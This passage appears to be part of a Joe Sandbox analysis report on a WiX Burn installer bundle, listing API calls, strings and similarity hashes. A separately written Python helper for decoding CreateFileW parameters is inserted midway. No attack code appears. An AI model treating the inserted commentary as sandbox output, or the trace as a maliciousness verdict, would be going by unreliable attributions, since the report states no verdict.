• DeleteFileW.KERNEL32(00000410,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 0080660A
• CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 00806619
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CloseDeleteErrorFileHandleLast
• String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
• API String ID: 3522763407-1704223933
• Opcode ID: 617e4c9f1d014f65b18ddafded6bdefd8e960a8080be61185614fd349e00196e
• Instruction ID: 7c3effffd8afe6d84a280654607bdc9160128d9b8fb2f98e193be7c726ff6785
• Opcode Fuzzy Hash: 617e4c9f1d014f65b18ddafded6bdefd8e960a8080be61185614fd349e00196e
• Instruction Fuzzy Hash: F951087290012ABFDB51DFA48C45EAEBBB9FF08710F044165FA24E6190E7358A619BA1
APIs
• _MREFOpen@16.MSPDB140-MSVCRT ref: 007C9EED
• _MREFOpen@16.MSPDB140-MSVCRT ref: 007C9F12
Strings
• MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 007CA006
• Failed to format product code string., xrefs: 007C9F1D
• Failed to get component path: %d, xrefs: 007C9F76
• Failed to format component id string., xrefs: 007C9EF8
• Failed to set variable., xrefs: 007C9FF6
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Open@16
• String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
• API String ID: 3613110473-1671347822
• Opcode ID: 2da95c2188caa8ed5b6ddf8c8b21d212179c8ea5c742c19439757508e9e9828c
• Instruction ID: 2c6b3a4a74d8cc51749891f5f0ae2c225b3e982efb98d6ade3da102c0834fa03
• Opcode Fuzzy Hash: 2da95c2188caa8ed5b6ddf8c8b21d212179c8ea5c742c19439757508e9e9828c
• Instruction Fuzzy Hash: F441B632900115BACFA59AA88C4EFBEB7A8FF05320F24461EF614F21D1E7399E50D752
APIs
• RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 007CF942
• RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 007CF94F
Strings
• Resume, xrefs: 007CF8B6
• Failed to read Resume value., xrefs: 007CF8D8
• %ls.RebootRequired, xrefs: 007CF82F
• Failed to format pending restart registry key to read., xrefs: 007CF846
• Failed to open registration key., xrefs: 007CF8AB
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Close
• String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
• API String ID: 3535843008-3890505273
• Opcode ID: 652f3b92dcf81621e92e1cc27fd9f9f67e0afebd6e46f23455cbbf0972b4c47d
• Instruction ID: ed1f1cf7036990b1164011555c63bb288306ba8f52d6697d4a7067d32fb41fcf
• Opcode Fuzzy Hash: 652f3b92dcf81621e92e1cc27fd9f9f67e0afebd6e46f23455cbbf0972b4c47d
• Instruction Fuzzy Hash: 29412971900119FFDF119F98C881FA9BBA6FB04310F55817EE910EB260C37AAE419B51
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID:
• String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
• API String ID: 0-660234312
• Opcode ID: 9c7f410afeaf965e08ca4ccd0d2164494d79eabac077638bf535897952add64d
• Instruction ID: bba7aa5c21ba8bb74bfc1d4bd99e2ad021ec0e4f5d24e3a6d6c4ca4212f2764c
• Opcode Fuzzy Hash: 9c7f410afeaf965e08ca4ccd0d2164494d79eabac077638bf535897952add64d
• Instruction Fuzzy Hash: 4E31B372904119BBCB229A94CC45E9EBB7AFB40720F214367F820F63D1EB759D41D691
APIs
• CoCreateInstance.OLE32(00820C4C,00000000,00000017,00820C5C,?,?,00000000,00000000,?,?,?,?,?,007EDEE7,00000000,00000000), ref: 007ED8E8
Strings
• Failed to create IBackgroundCopyManager., xrefs: 007ED8F4
• Failed to set notification flags for BITS job., xrefs: 007ED93A
• Failed to create BITS job., xrefs: 007ED922
                                                                                                                                                              • Failed to set BITS job to foreground., xrefs: 007ED969
                                                                                                                                                              • Failed to set progress timeout., xrefs: 007ED952
                                                                                                                                                              • WixBurn, xrefs: 007ED913
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                              • String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
                                                                                                                                                              • API String ID: 542301482-468763447
                                                                                                                                                              • Opcode ID: fe015132667b55370d66390c8eb4ada7563cf3487ba0e26952d34d1343f44083
                                                                                                                                                              • Instruction ID: 53fcac711fadbbced4515f6d38725b0cdd6ff56d0bfd884bb0ad0899c19e7982
                                                                                                                                                              • Opcode Fuzzy Hash: fe015132667b55370d66390c8eb4ada7563cf3487ba0e26952d34d1343f44083
                                                                                                                                                              • Instruction Fuzzy Hash: 4531A271F4136AAFDB24DBA9D845EAFBBB4EF48710B100159E901EB351CA38AC45CB91
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 00805DF8
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00805E05
                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 00805E4C
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00805E80
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 00805EB4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                              • String ID: %ls.R$dlutil.cpp
                                                                                                                                                              • API String ID: 3160720760-657863730
                                                                                                                                                              • Opcode ID: 9e49cdfbe101fe3b93376ab4ce458c744bdbaedf3cb4bf03c465aa6a3cda283c
                                                                                                                                                              • Instruction ID: 76208dda41e6cef93453c244452a53789b3cddf5d9544c4fdf5ba79cb2668779
                                                                                                                                                              • Opcode Fuzzy Hash: 9e49cdfbe101fe3b93376ab4ce458c744bdbaedf3cb4bf03c465aa6a3cda283c
                                                                                                                                                              • Instruction Fuzzy Hash: E031E772941625ABE7608B54CC49B6F7BA8FF01721F114229FE55EB2C0D7749E008AF0
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007CCD5E: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,007CE444,000000FF,00000000,00000000,007CE444,?,?,007CDBEB,?,?,?,?), ref: 007CCD89
                                                                                                                                                              • CreateFileW.KERNEL32(E90080BA,80000000,00000005,00000000,00000003,08000000,00000000,007C53C5,?,00000000,840F01E8,14680A79,00000001,007C53BD,00000000,007C5489), ref: 007CC956
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,007D7809,007C566D,007C5479,007C5479,00000000,?,007C5489,FFF9E89D,007C5489,007C54BD,007C5445,?,007C5445), ref: 007CC99B
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to verify catalog signature: %ls, xrefs: 007CC994
                                                                                                                                                              • Failed to get catalog local file path, xrefs: 007CC9D9
                                                                                                                                                              • Failed to open catalog in working path: %ls, xrefs: 007CC9C9
                                                                                                                                                              • catalog.cpp, xrefs: 007CC9BC
                                                                                                                                                              • Failed to find payload for catalog file., xrefs: 007CC9E0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareCreateErrorFileLastString
                                                                                                                                                              • String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
                                                                                                                                                              • API String ID: 1774366664-48089280
                                                                                                                                                              • Opcode ID: 4658fec68cd2aa6edd2ad0ea7a49c162c309a648154a9386a8a5b130ebd5f02f
                                                                                                                                                              • Instruction ID: 97d7b0afdba6b65640028f5684f3d4f4f34415ebc8154399264095eebdb73a82
                                                                                                                                                              • Opcode Fuzzy Hash: 4658fec68cd2aa6edd2ad0ea7a49c162c309a648154a9386a8a5b130ebd5f02f
                                                                                                                                                              • Instruction Fuzzy Hash: B931E772900625BBD7229B54CC06F59BBA4FF04720F21816EFA18EB281E779BD109BD0
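The CreateFileW calls in the dlutil.cpp and catalog.cpp functions above are listed as raw stack slots: the first seven values are the call's parameters, the remaining ones are return addresses and locals that happened to follow them on the stack. The following Python is an added example, not part of the Joe Sandbox report and not code from the WiX Burn engine whose strings (WixBurn, dlutil.cpp, catalog.cpp) these functions carry; it parses lines of this shape and expands the access mask, share mode, creation disposition and flags into their Win32 constant names so the intent of each open can be read off directly. The regular expression, the function names and the SAMPLE_LINES copies of the two trace lines are this example's own.

```python
import re

# Win32 constants from the Windows SDK headers (winnt.h / fileapi.h).
GENERIC_ACCESS = {
    0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL",
}
SHARE_MODE = {
    0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE",
}
CREATION_DISPOSITION = {
    1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
    4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING",
}
FLAGS_AND_ATTRIBUTES = {
    0x00000001: "FILE_ATTRIBUTE_READONLY", 0x00000002: "FILE_ATTRIBUTE_HIDDEN",
    0x00000080: "FILE_ATTRIBUTE_NORMAL", 0x00000100: "FILE_ATTRIBUTE_TEMPORARY",
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x10000000: "FILE_FLAG_RANDOM_ACCESS",
    0x40000000: "FILE_FLAG_OVERLAPPED", 0x80000000: "FILE_FLAG_WRITE_THROUGH",
}

# Shape of one Joe Sandbox API line: "<api>.<module>(<stack slots>), ref: <addr>".
# This regular expression is the example's own; the report has no such parser.
_CREATEFILEW_LINE = re.compile(
    r"CreateFileW\.KERNEL32\((?P<slots>[^)]*)\)\s*,\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# The two CreateFileW lines from the report above, copied here as sample input.
SAMPLE_LINES = [
    r"• CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,"
    r"00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 00805DF8",
    r"• CreateFileW.KERNEL32(E90080BA,80000000,00000005,00000000,00000003,08000000,"
    r"00000000,007C53C5,?,00000000,840F01E8,14680A79,00000001,007C53BD,00000000,"
    r"007C5489), ref: 007CC956",
]


def parse_slot(token):
    """Eight hex digits become an int; '?' and literal strings are kept as-is."""
    token = token.strip()
    if re.fullmatch(r"[0-9A-Fa-f]{8}", token):
        return int(token, 16)
    return token


def decode_mask(value, table):
    """Expand a DWORD bit mask into constant names; unknown bits stay as hex."""
    if not isinstance(value, int):
        return ["?"]
    names = [name for bit, name in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    leftover = value & ~known & 0xFFFFFFFF
    if leftover:
        names.append(f"0x{leftover:08X}")
    return names or ["0"]


def decode_createfilew(line):
    """Decode the seven CreateFileW parameters from one trace line, or None.

    Slots after the seventh are return addresses and locals captured from the
    stack, not parameters; they are passed through untouched in extra_stack.
    """
    match = _CREATEFILEW_LINE.search(line)
    if match is None:
        return None
    slots = [parse_slot(t) for t in match.group("slots").split(",")]
    if len(slots) < 7:
        return None
    name, access, share, sec_attr, disposition, flags, template = slots[:7]
    if isinstance(disposition, int):
        disp_name = CREATION_DISPOSITION.get(disposition, f"0x{disposition:X}")
    else:
        disp_name = "?"
    return {
        "ref": match.group("ref").upper(),
        "lpFileName": name,
        "dwDesiredAccess": decode_mask(access, GENERIC_ACCESS),
        "dwShareMode": decode_mask(share, SHARE_MODE),
        "lpSecurityAttributes": sec_attr,
        "dwCreationDisposition": disp_name,
        "dwFlagsAndAttributes": decode_mask(flags, FLAGS_AND_ATTRIBUTES),
        "hTemplateFile": template,
        "extra_stack": slots[7:],
    }


def opens_for_write(decoded):
    """True when the call can create or modify the file (write or full access)."""
    access = decoded["dwDesiredAccess"]
    return "GENERIC_WRITE" in access or "GENERIC_ALL" in access


def decode_report(text):
    """Decode every CreateFileW line in a pasted block of report text."""
    results = []
    for line in text.splitlines():
        decoded = decode_createfilew(line)
        if decoded is not None:
            results.append(decoded)
    return results
```

Run over the two sample lines, decode_report shows the dlutil.cpp open asking for GENERIC_READ|GENERIC_WRITE with OPEN_ALWAYS and FILE_SHARE_DELETE, so the file is created when it does not exist, which fits the "%ls.R" resume-marker string listed for that function; the catalog.cpp open is GENERIC_READ, OPEN_EXISTING with FILE_FLAG_SEQUENTIAL_SCAN, a read-once pattern consistent with the catalog signature-verification strings beside it. When triaging a long API list, filter on opens_for_write first: those are the calls that change the file system.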
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,00000000,?,?,?,?,007ED642,?), ref: 007ED357
                                                                                                                                                              • ReleaseMutex.KERNEL32(?,?,?,?,007ED642,?), ref: 007ED375
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007ED3B6
                                                                                                                                                              • ReleaseMutex.KERNEL32(?), ref: 007ED3CD
                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 007ED3D6
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get message from netfx chainer., xrefs: 007ED3F7
                                                                                                                                                              • Failed to send files in use message from netfx chainer., xrefs: 007ED41C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MutexObjectReleaseSingleWait$Event
                                                                                                                                                              • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
                                                                                                                                                              • API String ID: 2608678126-3424578679
                                                                                                                                                              • Opcode ID: f9ee1234c5b233744af9e81962f7291f8f866c5f97f24c5e2896224a576b7e66
                                                                                                                                                              • Instruction ID: 4a80d8a9c713396f5cc93733c7541c037fdd45e6bd0f6106324585f82f3eb299
                                                                                                                                                              • Opcode Fuzzy Hash: f9ee1234c5b233744af9e81962f7291f8f866c5f97f24c5e2896224a576b7e66
                                                                                                                                                              • Instruction Fuzzy Hash: D231F531900659FFCB229F95DC08EAEBBF8EF58320F108265F924E22A1C73499508B90
                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 008009AB
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 008009B5
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 008009FE
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 00800A0B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                                                              • String ID: "%ls" %ls$D$procutil.cpp
                                                                                                                                                              • API String ID: 161867955-2732225242
                                                                                                                                                              • Opcode ID: dda1d5bf582e8cd3bfccaddf77d7ef898dba4c5e37f59de3030900ff6d010ecd
                                                                                                                                                              • Instruction ID: 9e42ca1e85b7cf4a0571cde2790afb1a3f6fabc6e1a98de92b0e298061cd5df8
                                                                                                                                                              • Opcode Fuzzy Hash: dda1d5bf582e8cd3bfccaddf77d7ef898dba4c5e37f59de3030900ff6d010ecd
                                                                                                                                                              • Instruction Fuzzy Hash: 4C214F72D0125EABDB51DFD5CD45AAFBBB8FF04710F100029EA14F7251D3719E508AA1
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007C9BB3
                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,007CA8AB,00000100,000002C0,000002C0,00000100), ref: 007C9BD3
                                                                                                                                                              • GetLastError.KERNEL32(?,007CA8AB,00000100,000002C0,000002C0,00000100), ref: 007C9BDE
                                                                                                                                                              Strings
                                                                                                                                                              • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 007C9C4A
                                                                                                                                                              • Failed to set directory search path variable., xrefs: 007C9C0F
                                                                                                                                                              • Failed while searching directory search: %ls, for path: %ls, xrefs: 007C9C34
                                                                                                                                                              • Failed to format variable string., xrefs: 007C9BBE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                              • String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                                              • API String ID: 1811509786-2966038646
                                                                                                                                                              • Opcode ID: ad0fe1f2a933fd0fada43e3c4f001f523ee5ac8f4bfcab6f9c0fc636086a2991
                                                                                                                                                              • Instruction ID: 0a253ded9587ef057ff0cc68ca481cfc21895bbd7cbe9e6b6850bc880ba9bff2
                                                                                                                                                              • Opcode Fuzzy Hash: ad0fe1f2a933fd0fada43e3c4f001f523ee5ac8f4bfcab6f9c0fc636086a2991
                                                                                                                                                              • Instruction Fuzzy Hash: A821FC33940525F7CB7216A89D0AF6EBB65FF10320F20011DFE10B61A1D76D5D50AAD5
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007C9D64
                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,007CA883,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 007C9D84
                                                                                                                                                              • GetLastError.KERNEL32(?,007CA883,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 007C9D8F
                                                                                                                                                              Strings
                                                                                                                                                              • File search: %ls, did not find path: %ls, xrefs: 007C9DF3
                                                                                                                                                              • Failed to set variable to file search path., xrefs: 007C9DE7
                                                                                                                                                              • Failed while searching file search: %ls, for path: %ls, xrefs: 007C9DBD
                                                                                                                                                              • Failed to format variable string., xrefs: 007C9D6F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                              • String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
                                                                                                                                                              • API String ID: 1811509786-3425311760
                                                                                                                                                              • Opcode ID: aa6d4f57a4d264fe2c1c5ba4ae22328e72b742ca60fe14b9f37f99aaf7466271
                                                                                                                                                              • Instruction ID: 40c14502d0d6301432e862fe558611b24c3b7ee8248a8de0c002a0b9079f8fb8
                                                                                                                                                              • Opcode Fuzzy Hash: aa6d4f57a4d264fe2c1c5ba4ae22328e72b742ca60fe14b9f37f99aaf7466271
                                                                                                                                                              • Instruction Fuzzy Hash: 5511A833A40525F7DFA26698CD0AF5EBB65EF10721F20021DFA11B62A1E72A5E10A6D1
                                                                                                                                                              APIs
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 007C9AC4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeString
                                                                                                                                                              • String ID: Condition$ET|$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.$`<u
                                                                                                                                                              • API String ID: 3341692771-993761068
                                                                                                                                                              • Opcode ID: c364a2d373fe3d82ec90695757d9306778021e9f792f8692d765bdf1f2d19c53
                                                                                                                                                              • Instruction ID: 5a35aebcffa57bcbff94d1389bbc6a1d957dc17490e0a28f02d7553ae595dcfa
                                                                                                                                                              • Opcode Fuzzy Hash: c364a2d373fe3d82ec90695757d9306778021e9f792f8692d765bdf1f2d19c53
                                                                                                                                                              • Instruction Fuzzy Hash: E4116931941224BBDB959A94CD0AFADB768FF00721F11815DFD01FA290D7799E40D684
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,007DD365,00000000,?,?,007DC7C9,00000001,?,?,?,?,?), ref: 007DCF37
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007DD365,00000000,?,?,007DC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 007DCF41
                                                                                                                                                              • GetExitCodeThread.KERNEL32(00000001,?,?,?,007DD365,00000000,?,?,007DC7C9,00000001,?,?,?,?,?,00000000), ref: 007DCF7D
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007DD365,00000000,?,?,007DC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 007DCF87
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
